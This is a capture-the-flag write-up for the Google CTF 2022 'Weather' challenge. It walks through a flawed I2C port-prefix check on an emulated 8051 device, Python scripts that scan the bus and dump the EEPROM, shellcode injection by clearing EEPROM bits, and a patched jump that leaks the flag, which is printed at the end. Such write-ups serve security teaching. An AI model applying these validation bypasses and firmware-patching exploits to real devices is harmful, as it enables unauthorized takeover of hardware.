Rating:

# Weather
Weather was a hardware challenge on [Google CTF 2022](https://capturetheflag.withgoogle.com/) that was based around a weather station running on a microcontroller with attached sensors and a serial interface. The goal was extracting a flag from an internal ROM device.

For the challenge we were given a datasheet containing details about the microcontroller, its attached devices and the interfaces available. We were also given the firmware source code written in c.

## Reading the datasheet
From the datasheet we can determine the following information:

The microcontroller has three interfaces available: I2C for attached sensors, SPI for XRAM (external RAM) and UART for user communication with the weather station.

The XRAM attached through SPI, is a CTF-55930D, a 32K EEPROM storing the running program with an additional I2C interface (!).
If we were to write data to the EEPROM, we would not writing actual bits but would be sending the EEPROM information on which bits to **clear**.

The microcontroller also has a internally attached ROM containing the flag which can be accessed through special registers in the memory space.

We have the following sensors attached through I2C:
- Humidity Sensor at address 119
- Light Sensors at 110 and 111
- Pressure Sensor at 108
- Temperature Sensor at 101

We can also get some clues on other parts of the setup:

The microcontroller is called CTF-8051, which together with the Special Function Registers hints at the controller being some form of an 8051 processor.

## Analyzing the firmware source
From the firmware sources we can determine how to interface with the weather station.

First thing we could do knowing the goal was trying to find any references to flag ROM from which we want to read data, but outside the definitions of `FLAGROM_ADDR` and `FLAGROM_DATA` registers they were not used anywhere in the program so we will need to find another way in.

The communication is performed via UART (accessible through a network socket in our case) and after a prompt we can perform two actions:
- A read, with `r <addr> <size>` which will read `size` bytes from the device at address `addr`
- A write, with `w <addr> <size> <byte1> <byte2> .. <byteN>` which will write `size` bytes to device at address `addr`

The address provided in the command is checked against a list of predefined addresses:
```c
const char *ALLOWED_I2C[] = {
"101", // Thermometers (4x).
"108", // Atmospheric pressure sensor.
"110", // Light sensor A.
"111", // Light sensor B.
"119", // Humidity sensor.
NULL
};

// [...]

bool is_port_allowed(const char *port) {
for(const char **allowed = ALLOWED_I2C; *allowed; allowed++) {
const char *pa = *allowed;
const char *pb = port;
bool allowed = true;
while (*pa && *pb) {
if (*pa++ != *pb++) {
allowed = false;
break;
}
}
if (allowed && *pa == '\0') return true;
}
return false;
}

uint8_t str_to_uint8(const char *s) {
uint8_t v = 0;
while (*s) {
uint8_t digit = *s++ - '0';
if (digit >= 10) return 0;
v = v * 10 + digit;
}
return v;
}

int8_t port_to_int8(char *port) {
if (!is_port_allowed(port)) return -1;

return (int8_t) str_to_uint8(port);
}
```

The code checking if our address is allowed is flawed though, it only checks the first 3 bytes of our input as all the predefined addresses are 3 bytes long.
With the knowledge of that, if we were to send an address like `10100000000`, it would get accepted as a valid address but would zero out the `v` variable in `str_to_uint8` conversion function allowing us to then append any arbitrary address after it.

## Finding the EEPROM
With the ability to communicate with arbitrary devices, we can scan all the possible 128 addresses if there are devices present with code like the following:
```python
from pwn import *
p = remote('weather.2022.ctfcompetition.com', 1337)

def read_from_address(address, size):
p.recvuntil(b'? ')
p.sendline(f'r {address} {size}'.encode())
p.recvuntil(b'i2c status: ')
status = p.recvline().strip()
ret_data = p.recvuntil(b'\n-end\n', drop=True).decode().strip().split()
return status, bytes([int(a) for a in ret_data])

for i in range(128):
status, data = read_from_address(f'10100000000{i}', 128)
if status != b'error - device not found':
print(f'Device exists on address {i}')
```

With it we can discover a new unknown device at address 33. Based on the diagrams from the datasheet, it is very possible that it is the EEPROM containing the running program.

To verify that theory we can try reading the data pages from it following the instructions from the datasheet:
> Reading data from a 64-byte page is done in two steps:
> 1. Select the page by writing the page index to EEPROM's I2C address.
> 2. Receive up to 64 bytes by reading from the EEPROM's I2C address.

To do that we can use code like the one below:
```python
# See the code above to find the other functions used

def write_to_address(address, data):
size = len(data)
p.recvuntil(b'? ')
p.sendline(f'w {address} {size} {" ".join([str(a) for a in data])}'.encode())
p.recvuntil(b'i2c status: ')
return p.recvline().strip()

write_to_address(f'1010000000033', [0])
status, data = read_from_address(f'1010000000033', 64)
print(data.hex())
```

With some data returned, we can try dumping all the 64 pages of it.
```python
for i in range(64):
write_to_address(f'1010000000033', [i])
status, data = read_from_address(f'1010000000033', 64)
print(data.hex())
```

Now that we have the memory dumped, we can see what is inside it.
```
» strings eeprom.raw
// [...]
"i2c status: transaction completed / ready
i2c status: busy
i2c status: error - device not found
i2c status: error - device misbehaved
i2c status: unknown error
Weather Station
-err: command too long, rejected
-err: command format incorrect
-err: unknown command
-err: port invalid or not allowed
-err: I2C request length incorrect
-end
```

This means that we did indeed dump the program memory.

## Taking control of the device
### Creating the shellcode
With access to the memory of the device, we can now see a way how to extract the flag out of the internal ROM.

To get some shellcode we can use [sdcc](http://sdcc.sourceforge.net/) which will produce a listing file (`.lst`) which will contain a program listing for our compiled program with instruction bytes, source code lines and other relevant information inside it.

The exploit code has to read the flag rom byte by byte and output the data into the `SERIAL_OUT_DATA` register for us to read it.

Sample exploit code:
```c
#include <stdint.h>
__sfr __at(0xee) FLAGROM_ADDR;
__sfr __at(0xef) FLAGROM_DATA;
__sfr __at(0xf2) SERIAL_OUT_DATA;
__sfr __at(0xf3) SERIAL_OUT_READY;

int main(void) {
uint8_t a = 0;
while (a < 255) {
FLAGROM_ADDR = a;
while (!SERIAL_OUT_READY) {};
SERIAL_OUT_DATA = FLAGROM_DATA;
a++;
}
return 0;
}
```

Then after compiling our exploit code with `sdcc exploit.c`, we can view `exploit.lst` to read out the instruction bytes for our exploit.
```
140 ; exploit.c:9: while (a < 255) {
000000 7F 00 [12] 141 mov r7,#0x00
000002 142 00104$:
000002 BF FF 00 [24] 143 cjne r7,#0xff,00126$
000005 144 00126$:
000005 50 0C [24] 145 jnc 00106$
146 ; exploit.c:10: FLAGROM_ADDR = a;
000007 8F EE [24] 147 mov _FLAGROM_ADDR,r7
148 ; exploit.c:11: while (!SERIAL_OUT_READY) {};
000009 149 00101$:
000009 E5 F3 [12] 150 mov a,_SERIAL_OUT_READY
00000B 60 FC [24] 151 jz 00101$
152 ; exploit.c:12: SERIAL_OUT_DATA = FLAGROM_DATA;
00000D 85 EF F2 [24] 153 mov _SERIAL_OUT_DATA,_FLAGROM_DATA
154 ; exploit.c:13: a++;
000010 0F [12] 155 inc r7
000011 80 EF [24] 156 sjmp 00104$
000013 157 00106$:
158 ; exploit.c:15: return 0;
000013 90 00 00 [24] 159 mov dptr,#0x0000
160 ; exploit.c:16: }
000016 22 [24] 161 ret
```

### Writing our shellcode into memory
Near the end of program memory we can see 24 pages filled with `FF` bytes which is a perfect place for us to write shellcode to that would sequentially read bytes out of the flag rom and would send them to the UART interface.

It's the perfect place because as it was mentioned previously, writing data to the EEPROM is actually done by sending bits to clear, there is no way for us to set a 1 if it was cleared before. This place in memory lets us write exactly what we want without any larger constraints.

To write our data into a page with a bunch of FF bytes we can yet again turn to the datasheet to find out how to do that:
> Programming the EEPROM is done by writing the following packet to the EEPROM's I2C address:
> `<PageIndex> <4ByteWriteKey> <ClearMask> ... <ClearMask>`
> The PageIndex selects a 64-byte page to operate on. The WriteKey is a 4 byte unlock key meant to prevent accidental overwrites.
> Its value is constant: `A5 5A A5 5A`. Each ClearMask byte is applied to the consecutive bytes of the page, starting from byte at index 0.
> All bits set to 1 in the ClearMask are cleared (set to 0) for the given byte in the given page on the EEPROM:
> `byte[i] ← byte[i] AND (NOT clear_mask_byte)`

With that known, we can write a helper function to write given data into the EEPROM:
```python
def write_eeprom_page(page, data):
if len(data) != 64:
data += b'\x00' * (64 - len(data))
data = bytes([((~a) & 0xff) for a in data])
write_to_address(f'1010000000033', bytes([page, 0xa5, 0x5a, 0xa5, 0x5a]) + data)
```

And to test it, we can write our shellcode into the first page which contains the FF bytes:
```python
shellcode = bytes.fromhex('7F 00 BF FF 00 50 0C 8F EE E5 F3 60 FC 85 EF F2 0F 80 EF 90 00 00 22')

# Read the existing data
write_to_address(f'1010000000033', [40])
status, data = read_from_address(f'1010000000033', 64)
print(data.hex())
# 3900ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

# Write our shellcode with some nop bytes
write_eeprom_page(40, b'\x00' * 16 + shellcode)

# Verify if it was written
write_to_address(f'1010000000033', [40])
status, data = read_from_address(f'1010000000033', 64)
print(data.hex())
# 000000000000000000000000000000007f00bfff00500c8feee5f360fc85eff20f80ef9000002200000000000000000000000000000000000000000000000000
```

### Finding a way to run our shellcode
The other problem is getting the shellcode to execute. If we were to place it at address 0xa00 (page 40), we could perform a `LJMP 0xa00` instruction which according to the [8051 instruction reference](https://www.win.tue.nl/~aeb/comp/8051/set8051.html#51ljmp) would be `02 0a 00`.

Knowing that, we can try to find a place in main() which would allow us to clear some bits to turn an instruction into our jump.

First, we can try to correlate the data we dumped from the memory with a compiled version of the firmware. To do that, we can compile the `firmware.c` with sdcc and use the resulting listing again.

In the listing we can find that the main loop starts around the address 1099 (0x44B):
```
1032 ;------------------------------------------------------------
1033 ; firmware.c:200: int main(void) {
1034 ; -----------------------------------------
1035 ; function main
1036 ; -----------------------------------------
000442 1037 _main:
1038 ; firmware.c:201: serial_print("Weather Station\n");
000442 90r00rA5 [24] 1039 mov dptr,#___str_5
000445 75 F0 80 [24] 1040 mov b,#0x80
000448 12r00r8D [24] 1041 lcall _serial_print
1042 ; firmware.c:206: while (true) {
00044B 1043 00135$:
1044 ; firmware.c:207: serial_print("? ");
00044B 90r00rB6 [24] 1045 mov dptr,#___str_6
00044E 75 F0 80 [24] 1046 mov b,#0x80
000451 12r00r8D [24] 1047 lcall _serial_print

```

Then we can loop over the program bytes trying to find a place which we can use for the jump:
```python
program = open('eeprom.raw', 'rb').read() # Previously extracted program memory

def and_bytes(a, b):
return bytes([aa & bb for aa, bb in zip(a, b)])

target = b'\x02\x0a\x00'
for offset in range(0x44B, 0x6B9):
if and_bytes(target, program[offset:offset+3]) == target:
print(f'Jump possible at {hex(offset)}')
```

And with the position of a viable jump known, we can then overwrite the instructions with our helper write function:
```python
page_number = offset // 64
instr_offset = offset % 64
jump_data = b'\x00' * instr_offset + target
jump_data += b'\x00' * (64 - len(jump_data))

write_eeprom_page(page_number, jump_data)
```

Then, with our jump written we need to send any valid instruction for the program to get to our jump:
```python
p.sendline(b'r 1 1')
p.interactive()
```

And with that, we get a dump of the flag ROM:
```
[*] Switching to interactive mode
? CTF{DoesAnyoneEvenReadFlagsAnymore?}
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00err: port invalid or not allowed
```

Original writeup (https://gist.github.com/szymex73/29f470c7d053ab8a80de6a78c896a727).